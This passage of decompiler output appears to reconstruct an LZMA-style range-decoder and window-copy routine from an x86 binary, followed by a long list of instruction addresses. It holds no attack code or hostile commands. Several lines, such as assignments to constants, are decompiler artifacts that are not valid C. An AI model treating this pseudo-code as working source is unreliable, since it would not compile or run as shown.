                                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  								goto L148;
                                                                                  							} else {
                                                                                  								goto L146;
                                                                                  							}
                                                                                  						case 0x19:
                                                                                  							__eflags = __ebx - 4;
                                                                                  							if(__ebx < 4) {
                                                                                  								 *(__ebp - 0x2c) = __ebx;
                                                                                  								L119:
                                                                                  								_t393 = __ebp - 0x2c;
                                                                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                  								__eflags =  *_t393;
                                                                                  								L120:
                                                                                  								__eax =  *(__ebp - 0x2c);
                                                                                  								__eflags = __eax;
                                                                                  								if(__eax == 0) {
                                                                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                  									goto L170;
                                                                                  								}
                                                                                  								__eflags = __eax -  *(__ebp - 0x60);
                                                                                  								if(__eax >  *(__ebp - 0x60)) {
                                                                                  									goto L171;
                                                                                  								}
                                                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                  								__eax =  *(__ebp - 0x30);
                                                                                  								_t400 = __ebp - 0x60;
                                                                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                  								__eflags =  *_t400;
                                                                                  								goto L123;
                                                                                  							}
                                                                                  							__ecx = __ebx;
                                                                                  							__eax = __ebx;
                                                                                  							__ecx = __ebx >> 1;
                                                                                  							__eax = __ebx & 0x00000001;
                                                                                  							__ecx = (__ebx >> 1) - 1;
                                                                                  							__al = __al | 0x00000002;
                                                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                                                  							__eflags = __ebx - 0xe;
                                                                                  							 *(__ebp - 0x2c) = __eax;
                                                                                  							if(__ebx >= 0xe) {
                                                                                  								__ebx = 0;
                                                                                  								 *(__ebp - 0x48) = __ecx;
                                                                                  								L102:
                                                                                  								__eflags =  *(__ebp - 0x48);
                                                                                  								if( *(__ebp - 0x48) <= 0) {
                                                                                  									__eax = __eax + __ebx;
                                                                                  									 *(__ebp - 0x40) = 4;
                                                                                  									 *(__ebp - 0x2c) = __eax;
                                                                                  									__eax =  *(__ebp - 4);
                                                                                  									__eax =  *(__ebp - 4) + 0x644;
                                                                                  									__eflags = __eax;
                                                                                  									L108:
                                                                                  									__ebx = 0;
                                                                                  									 *(__ebp - 0x58) = __eax;
                                                                                  									 *(__ebp - 0x50) = 1;
                                                                                  									 *(__ebp - 0x44) = 0;
                                                                                  									 *(__ebp - 0x48) = 0;
                                                                                  									L112:
                                                                                  									__eax =  *(__ebp - 0x40);
                                                                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                  										_t391 = __ebp - 0x2c;
                                                                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                  										__eflags =  *_t391;
                                                                                  										goto L119;
                                                                                  									}
                                                                                  									__eax =  *(__ebp - 0x50);
                                                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  									__eax =  *(__ebp - 0x58);
                                                                                  									__esi = __edi + __eax;
                                                                                  									 *(__ebp - 0x54) = __esi;
                                                                                  									__ax =  *__esi;
                                                                                  									__ecx = __ax & 0x0000ffff;
                                                                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                  									if( *(__ebp - 0xc) >= __edx) {
                                                                                  										__ecx = 0;
                                                                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                  										__ecx = 1;
                                                                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                  										__ebx = 1;
                                                                                  										__ecx =  *(__ebp - 0x48);
                                                                                  										__ebx = 1 << __cl;
                                                                                  										__ecx = 1 << __cl;
                                                                                  										__ebx =  *(__ebp - 0x44);
                                                                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                  										__cx = __ax;
                                                                                  										__cx = __ax >> 5;
                                                                                  										__eax = __eax - __ecx;
                                                                                  										__edi = __edi + 1;
                                                                                  										__eflags = __edi;
                                                                                  										 *(__ebp - 0x44) = __ebx;
                                                                                  										 *__esi = __ax;
                                                                                  										 *(__ebp - 0x50) = __edi;
                                                                                  									} else {
                                                                                  										 *(__ebp - 0x10) = __edx;
                                                                                  										0x800 = 0x800 - __ecx;
                                                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  										 *__esi = __dx;
                                                                                  									}
                                                                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  										L111:
                                                                                  										_t368 = __ebp - 0x48;
                                                                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                  										__eflags =  *_t368;
                                                                                  										goto L112;
                                                                                  									} else {
                                                                                  										goto L109;
                                                                                  									}
                                                                                  								}
                                                                                  								__ecx =  *(__ebp - 0xc);
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                  									__ecx =  *(__ebp - 0x10);
                                                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  									__ebx = __ebx | 0x00000001;
                                                                                  									__eflags = __ebx;
                                                                                  									 *(__ebp - 0x44) = __ebx;
                                                                                  								}
                                                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  									L101:
                                                                                  									_t338 = __ebp - 0x48;
                                                                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                  									__eflags =  *_t338;
                                                                                  									goto L102;
                                                                                  								} else {
                                                                                  									goto L99;
                                                                                  								}
                                                                                  							}
                                                                                  							__edx =  *(__ebp - 4);
                                                                                  							__eax = __eax - __ebx;
                                                                                  							 *(__ebp - 0x40) = __ecx;
                                                                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                  							goto L108;
                                                                                  						case 0x1a:
                                                                                  							L56:
                                                                                  							__eflags =  *(__ebp - 0x64);
                                                                                  							if( *(__ebp - 0x64) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0x1a;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x68);
                                                                                  							__al =  *(__ebp - 0x5c);
                                                                                  							__edx =  *(__ebp - 8);
                                                                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  							 *( *(__ebp - 0x68)) = __al;
                                                                                  							__ecx =  *(__ebp - 0x14);
                                                                                  							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                  							__eax = __ecx + 1;
                                                                                  							__edx = 0;
                                                                                  							_t192 = __eax %  *(__ebp - 0x74);
                                                                                  							__eax = __eax /  *(__ebp - 0x74);
                                                                                  							__edx = _t192;
                                                                                  							goto L79;
                                                                                  						case 0x1b:
                                                                                  							goto L75;
                                                                                  						case 0x1c:
                                                                                  							while(1) {
                                                                                  								L123:
                                                                                  								__eflags =  *(__ebp - 0x64);
                                                                                  								if( *(__ebp - 0x64) == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								__eax =  *(__ebp - 0x14);
                                                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                                                  									__eflags = __eax;
                                                                                  								}
                                                                                  								__edx =  *(__ebp - 8);
                                                                                  								__cl =  *(__eax + __edx);
                                                                                  								__eax =  *(__ebp - 0x14);
                                                                                  								 *(__ebp - 0x5c) = __cl;
                                                                                  								 *(__eax + __edx) = __cl;
                                                                                  								__eax = __eax + 1;
                                                                                  								__edx = 0;
                                                                                  								_t414 = __eax %  *(__ebp - 0x74);
                                                                                  								__eax = __eax /  *(__ebp - 0x74);
                                                                                  								__edx = _t414;
                                                                                  								__eax =  *(__ebp - 0x68);
                                                                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                  								__eflags =  *(__ebp - 0x30);
                                                                                  								 *( *(__ebp - 0x68)) = __cl;
                                                                                  								 *(__ebp - 0x14) = _t414;
                                                                                  								if( *(__ebp - 0x30) > 0) {
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									goto L80;
                                                                                  								}
                                                                                  							}
                                                                                  							 *(__ebp - 0x88) = 0x1c;
                                                                                  							goto L170;
                                                                                  					}
                                                                                  				}
                                                                                  			}













                                                                                  0x00000000
                                                                                  0x004070ab
                                                                                  0x004070ab
                                                                                  0x004070af
                                                                                  0x00407166
                                                                                  0x00407169
                                                                                  0x00407175
                                                                                  0x00407056
                                                                                  0x00407056
                                                                                  0x00407059
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x0040741a
                                                                                  0x00407441
                                                                                  0x00407441
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x0040741c
                                                                                  0x00407420
                                                                                  0x004075cf
                                                                                  0x00000000
                                                                                  0x004075cf
                                                                                  0x0040742c
                                                                                  0x00407433
                                                                                  0x0040743b
                                                                                  0x0040743e
                                                                                  0x00000000
                                                                                  0x0040743e
                                                                                  0x004070b5
                                                                                  0x004070b9
                                                                                  0x004075fa
                                                                                  0x004075fa
                                                                                  0x004075fd
                                                                                  0x00407601
                                                                                  0x00407601
                                                                                  0x004070bf
                                                                                  0x004070c5
                                                                                  0x004070c8
                                                                                  0x004070cc
                                                                                  0x004070cf
                                                                                  0x004070d3
                                                                                  0x00407599
                                                                                  0x004075e5
                                                                                  0x004075ed
                                                                                  0x004075f4
                                                                                  0x004075f6
                                                                                  0x00000000
                                                                                  0x004075f6
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070e2
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e7
                                                                                  0x004070ea
                                                                                  0x004070ed
                                                                                  0x004070f0
                                                                                  0x004070f3
                                                                                  0x004070f6
                                                                                  0x004070f7
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070fc
                                                                                  0x004070ff
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407108
                                                                                  0x0040710a
                                                                                  0x0040710a
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406bec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x00000000
                                                                                  0x00406bfd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c06
                                                                                  0x00406c09
                                                                                  0x00406c0c
                                                                                  0x00406c10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c16
                                                                                  0x00406c19
                                                                                  0x00406c1b
                                                                                  0x00406c1c
                                                                                  0x00406c1f
                                                                                  0x00406c21
                                                                                  0x00406c22
                                                                                  0x00406c24
                                                                                  0x00406c27
                                                                                  0x00406c2c
                                                                                  0x00406c31
                                                                                  0x00406c3a
                                                                                  0x00406c4d
                                                                                  0x00406c50
                                                                                  0x00406c5c
                                                                                  0x00406c84
                                                                                  0x00406c86
                                                                                  0x00406c94
                                                                                  0x00406c94
                                                                                  0x00406c98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8c
                                                                                  0x00406c8c
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c62
                                                                                  0x00406c67
                                                                                  0x00406c67
                                                                                  0x00406c70
                                                                                  0x00406c78
                                                                                  0x00406c7b
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c9e
                                                                                  0x00406c9e
                                                                                  0x00406ca2
                                                                                  0x0040754e
                                                                                  0x00000000
                                                                                  0x0040754e
                                                                                  0x00406cab
                                                                                  0x00406cbb
                                                                                  0x00406cbe
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc4
                                                                                  0x00406cc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406cca
                                                                                  0x00406cd0
                                                                                  0x00406cfa
                                                                                  0x00406d00
                                                                                  0x00406d07
                                                                                  0x00000000
                                                                                  0x00406d07
                                                                                  0x00406cd6
                                                                                  0x00406cd9
                                                                                  0x00406cde
                                                                                  0x00406cde
                                                                                  0x00406ce9
                                                                                  0x00406cf1
                                                                                  0x00406cf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d39
                                                                                  0x00406d3f
                                                                                  0x00406d42
                                                                                  0x00406d4f
                                                                                  0x00406d57
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d0e
                                                                                  0x00406d0e
                                                                                  0x00406d12
                                                                                  0x0040755d
                                                                                  0x00000000
                                                                                  0x0040755d
                                                                                  0x00406d1e
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d2c
                                                                                  0x00406d2f
                                                                                  0x00406d32
                                                                                  0x00406d37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d5f
                                                                                  0x00406d61
                                                                                  0x00406d64
                                                                                  0x00406dd5
                                                                                  0x00406dd8
                                                                                  0x00406ddb
                                                                                  0x00406de2
                                                                                  0x00406dec
                                                                                  0x00000000
                                                                                  0x00406dec
                                                                                  0x00406d66
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d6f
                                                                                  0x00406d72
                                                                                  0x00406d75
                                                                                  0x00406d77
                                                                                  0x00406d7a
                                                                                  0x00406d7c
                                                                                  0x00406d81
                                                                                  0x00406d84
                                                                                  0x00406d87
                                                                                  0x00406d8b
                                                                                  0x00406d92
                                                                                  0x00406d95
                                                                                  0x00406d9c
                                                                                  0x00406da0
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406dac
                                                                                  0x00406daf
                                                                                  0x00406dcd
                                                                                  0x00406dcf
                                                                                  0x00000000
                                                                                  0x00406db1
                                                                                  0x00406db1
                                                                                  0x00406db4
                                                                                  0x00406db7
                                                                                  0x00406dba
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbf
                                                                                  0x00406dc2
                                                                                  0x00406dc4
                                                                                  0x00406dc5
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406ffe
                                                                                  0x00407002
                                                                                  0x00407020
                                                                                  0x00407023
                                                                                  0x0040702a
                                                                                  0x0040702d
                                                                                  0x00407030
                                                                                  0x00407033
                                                                                  0x00407036
                                                                                  0x00407039
                                                                                  0x0040703b
                                                                                  0x00407042
                                                                                  0x00407043
                                                                                  0x00407045
                                                                                  0x00407048
                                                                                  0x0040704b
                                                                                  0x0040704e
                                                                                  0x0040704e
                                                                                  0x00407053
                                                                                  0x00000000
                                                                                  0x00407053
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x00407014
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407068
                                                                                  0x0040706c
                                                                                  0x0040708f
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x0040709f
                                                                                  0x0040706e
                                                                                  0x0040706e
                                                                                  0x00407071
                                                                                  0x00407074
                                                                                  0x00407077
                                                                                  0x00407084
                                                                                  0x00407087
                                                                                  0x00407087
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040711c
                                                                                  0x00407120
                                                                                  0x00407127
                                                                                  0x0040712a
                                                                                  0x0040712d
                                                                                  0x00407137
                                                                                  0x00000000
                                                                                  0x00407137
                                                                                  0x00407122
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407143
                                                                                  0x00407147
                                                                                  0x0040714e
                                                                                  0x00407151
                                                                                  0x00407154
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407157
                                                                                  0x0040715a
                                                                                  0x0040715d
                                                                                  0x0040715d
                                                                                  0x00407160
                                                                                  0x00407163
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407203
                                                                                  0x00407203
                                                                                  0x00407207
                                                                                  0x004075a5
                                                                                  0x00000000
                                                                                  0x004075a5
                                                                                  0x0040720d
                                                                                  0x00407210
                                                                                  0x00407213
                                                                                  0x00407217
                                                                                  0x0040721a
                                                                                  0x00407220
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407225
                                                                                  0x00407228
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406df8
                                                                                  0x00406df8
                                                                                  0x00406dfc
                                                                                  0x00407569
                                                                                  0x00000000
                                                                                  0x00407569
                                                                                  0x00406e02
                                                                                  0x00406e05
                                                                                  0x00406e08
                                                                                  0x00406e0c
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e1a
                                                                                  0x00406e1d
                                                                                  0x00406e1d
                                                                                  0x00406e20
                                                                                  0x00406e23
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e29
                                                                                  0x00406e2f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e35
                                                                                  0x00406e35
                                                                                  0x00406e39
                                                                                  0x00406e3c
                                                                                  0x00406e3f
                                                                                  0x00406e42
                                                                                  0x00406e45
                                                                                  0x00406e46
                                                                                  0x00406e49
                                                                                  0x00406e4b
                                                                                  0x00406e51
                                                                                  0x00406e54
                                                                                  0x00406e57
                                                                                  0x00406e5a
                                                                                  0x00406e5d
                                                                                  0x00406e60
                                                                                  0x00406e63
                                                                                  0x00406e7f
                                                                                  0x00406e82
                                                                                  0x00406e85
                                                                                  0x00406e88
                                                                                  0x00406e8f
                                                                                  0x00406e93
                                                                                  0x00406e95
                                                                                  0x00406e99
                                                                                  0x00406e65
                                                                                  0x00406e65
                                                                                  0x00406e69
                                                                                  0x00406e71
                                                                                  0x00406e76
                                                                                  0x00406e78
                                                                                  0x00406e7a
                                                                                  0x00406e7a
                                                                                  0x00406e9c
                                                                                  0x00406ea3
                                                                                  0x00406ea6
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eb1
                                                                                  0x00406eb1
                                                                                  0x00406eb5
                                                                                  0x00407575
                                                                                  0x00000000
                                                                                  0x00407575
                                                                                  0x00406ebb
                                                                                  0x00406ebe
                                                                                  0x00406ec1
                                                                                  0x00406ec5
                                                                                  0x00406ec8
                                                                                  0x00406ece
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed3
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406edc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ede
                                                                                  0x00406ee1
                                                                                  0x00406ee4
                                                                                  0x00406ee7
                                                                                  0x00406eea
                                                                                  0x00406eed
                                                                                  0x00406ef0
                                                                                  0x00406ef3
                                                                                  0x00406ef6
                                                                                  0x00406ef9
                                                                                  0x00406efc
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f1a
                                                                                  0x00406f1d
                                                                                  0x00406f1d
                                                                                  0x00406f20
                                                                                  0x00406f24
                                                                                  0x00406f26
                                                                                  0x00406efe
                                                                                  0x00406efe
                                                                                  0x00406f06
                                                                                  0x00406f0b
                                                                                  0x00406f0d
                                                                                  0x00406f0f
                                                                                  0x00406f0f
                                                                                  0x00406f29
                                                                                  0x00406f30
                                                                                  0x00406f33
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00406f33
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f75
                                                                                  0x00406f75
                                                                                  0x00406f79
                                                                                  0x00407581
                                                                                  0x00000000
                                                                                  0x00407581
                                                                                  0x00406f7f
                                                                                  0x00406f82
                                                                                  0x00406f85
                                                                                  0x00406f89
                                                                                  0x00406f8c
                                                                                  0x00406f92
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f97
                                                                                  0x00406f9a
                                                                                  0x00406f9a
                                                                                  0x00406fa0
                                                                                  0x00406f3e
                                                                                  0x00406f3e
                                                                                  0x00406f41
                                                                                  0x00000000
                                                                                  0x00406f41
                                                                                  0x00406fa2
                                                                                  0x00406fa2
                                                                                  0x00406fa5
                                                                                  0x00406fa8
                                                                                  0x00406fab
                                                                                  0x00406fae
                                                                                  0x00406fb1
                                                                                  0x00406fb4
                                                                                  0x00406fb7
                                                                                  0x00406fba
                                                                                  0x00406fbd
                                                                                  0x00406fc0
                                                                                  0x00406fd8
                                                                                  0x00406fdb
                                                                                  0x00406fde
                                                                                  0x00406fe1
                                                                                  0x00406fe1
                                                                                  0x00406fe4
                                                                                  0x00406fe8
                                                                                  0x00406fea
                                                                                  0x00406fc2
                                                                                  0x00406fc2
                                                                                  0x00406fca
                                                                                  0x00406fcf
                                                                                  0x00406fd1
                                                                                  0x00406fd3
                                                                                  0x00406fd3
                                                                                  0x00406fed
                                                                                  0x00406ff4
                                                                                  0x00406ff7
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00407286
                                                                                  0x00407286
                                                                                  0x0040728a
                                                                                  0x004075b1
                                                                                  0x00000000
                                                                                  0x004075b1
                                                                                  0x00407290
                                                                                  0x00407293
                                                                                  0x00407296
                                                                                  0x0040729a
                                                                                  0x0040729d
                                                                                  0x004072a3
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407395
                                                                                  0x00407399
                                                                                  0x004073bb
                                                                                  0x004073be
                                                                                  0x004073c8
                                                                                  0x00000000
                                                                                  0x004073c8
                                                                                  0x0040739b
                                                                                  0x0040739e
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407452
                                                                                  0x00407456
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x0040747b
                                                                                  0x00407482
                                                                                  0x00407489
                                                                                  0x00407489
                                                                                  0x00000000
                                                                                  0x00407489
                                                                                  0x00407458
                                                                                  0x0040745b
                                                                                  0x0040745e
                                                                                  0x00407461
                                                                                  0x00407468
                                                                                  0x004073ac
                                                                                  0x004073ac
                                                                                  0x004073af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407543
                                                                                  0x00407546
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040717d
                                                                                  0x0040717f
                                                                                  0x00407186
                                                                                  0x00407187
                                                                                  0x00407189
                                                                                  0x0040718c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407194
                                                                                  0x00407197
                                                                                  0x0040719a
                                                                                  0x0040719c
                                                                                  0x0040719e
                                                                                  0x0040719e
                                                                                  0x0040719f
                                                                                  0x004071a2
                                                                                  0x004071a9
                                                                                  0x004071ac
                                                                                  0x004071ba
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040749f
                                                                                  0x0040749f
                                                                                  0x004074a3
                                                                                  0x004075db
                                                                                  0x00000000
                                                                                  0x004075db
                                                                                  0x004074a9
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074b3
                                                                                  0x004074b6
                                                                                  0x004074bc
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074c1
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c7
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x0040752b
                                                                                  0x0040752e
                                                                                  0x00407533
                                                                                  0x00407534
                                                                                  0x00407536
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00000000
                                                                                  0x0040753b
                                                                                  0x004074cd
                                                                                  0x004074d3
                                                                                  0x004074d6
                                                                                  0x004074d9
                                                                                  0x004074dc
                                                                                  0x004074df
                                                                                  0x004074e2
                                                                                  0x004074e5
                                                                                  0x004074e8
                                                                                  0x004074eb
                                                                                  0x004074ee
                                                                                  0x00407507
                                                                                  0x0040750a
                                                                                  0x0040750d
                                                                                  0x00407510
                                                                                  0x00407514
                                                                                  0x00407516
                                                                                  0x00407516
                                                                                  0x00407517
                                                                                  0x0040751a
                                                                                  0x004074f0
                                                                                  0x004074f0
                                                                                  0x004074f8
                                                                                  0x004074fd
                                                                                  0x004074ff
                                                                                  0x00407502
                                                                                  0x00407502
                                                                                  0x0040751d
                                                                                  0x00407524
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071fb
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732e
                                                                                  0x0040732e
                                                                                  0x00407331
                                                                                  0x00407333
                                                                                  0x004075bd
                                                                                  0x00000000
                                                                                  0x004075bd
                                                                                  0x00407339
                                                                                  0x0040733c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407342
                                                                                  0x00407346
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00000000
                                                                                  0x00407349
                                                                                  0x004071c7
                                                                                  0x004071c9
                                                                                  0x004071cb
                                                                                  0x004071cd
                                                                                  0x004071d0
                                                                                  0x004071d1
                                                                                  0x004071d3
                                                                                  0x004071d5
                                                                                  0x004071d8
                                                                                  0x004071db
                                                                                  0x004071f1
                                                                                  0x004071f6
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x0040725e
                                                                                  0x00407260
                                                                                  0x00407267
                                                                                  0x0040726a
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407272
                                                                                  0x00407272
                                                                                  0x00407274
                                                                                  0x00407277
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x004072ae
                                                                                  0x004072ae
                                                                                  0x004072b1
                                                                                  0x004072b4
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00000000
                                                                                  0x00407328
                                                                                  0x004072b6
                                                                                  0x004072bc
                                                                                  0x004072bf
                                                                                  0x004072c2
                                                                                  0x004072c5
                                                                                  0x004072c8
                                                                                  0x004072cb
                                                                                  0x004072ce
                                                                                  0x004072d1
                                                                                  0x004072d4
                                                                                  0x004072d7
                                                                                  0x004072f0
                                                                                  0x004072f2
                                                                                  0x004072f5
                                                                                  0x004072f6
                                                                                  0x004072f9
                                                                                  0x004072fb
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407305
                                                                                  0x00407307
                                                                                  0x0040730a
                                                                                  0x0040730e
                                                                                  0x00407310
                                                                                  0x00407310
                                                                                  0x00407311
                                                                                  0x00407314
                                                                                  0x00407317
                                                                                  0x004072d9
                                                                                  0x004072d9
                                                                                  0x004072e1
                                                                                  0x004072e6
                                                                                  0x004072e8
                                                                                  0x004072eb
                                                                                  0x004072eb
                                                                                  0x0040731a
                                                                                  0x00407321
